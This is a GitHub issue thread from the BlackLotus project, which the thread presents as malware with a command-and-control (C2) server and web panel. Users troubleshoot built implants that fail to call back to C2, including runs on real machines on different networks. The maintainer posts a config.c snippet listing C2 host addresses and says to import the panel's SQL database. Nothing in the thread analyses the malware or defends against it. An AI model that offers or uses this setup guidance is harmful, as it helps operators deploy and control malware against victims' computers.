### ISSUE TITLE
[BUG] No connection on any C2 Hostname Or IP

### ISSUE THREAD

**Issue by uwuw7** [ldpreload/BlackLotus#19]
Finally got it to build after days of pain, but can't get any connections to work on any c2 hostname or IP. I've opened ports on all I've tried, tried using a dns for hostname, tried using multiple IPS or just one, nothing will connect. Panel is located at ip/panel/index.php if it matters

Ran the exe in multiple vms, as well as real machines on different networks, with no results.

Everything is configured and built correctly, just fully not working when it should be. Not an antivirus issue or a compilation issue, just an issue of it not working at all

**Comment by ldpreload** [comment]
Inside of Shared/config.c, you can actually list multiple hosts for your C2. Make sure you've got the right host, IP address, or whatever your C2 needs.

```
#include <Windows.h>
#include "config.h"

LPTSTR      g_Hosts[]    = { "127.0.0.1", "10.0.0.65", NULL};
UCHAR      g_NumberHosts  = (UCHAR)(sizeof(g_Hosts) / sizeof(LPTSTR));
```

Please also make sure to import the SQL file located in private/db.sql to MySQL (or whichever SQL server you prefer).

Final result:
![photo](https://github.com/ldpreload/BlackLotus/assets/95562574/d641e21e-2539-4423-aaba-ccb5eec4df68)

**Comment by blackbeltprocrastinator** [comment]
@uwuw7 hi, any luck in resolving this? I'm getting NULL responses despite changing config.c and even enabling HTTPS.
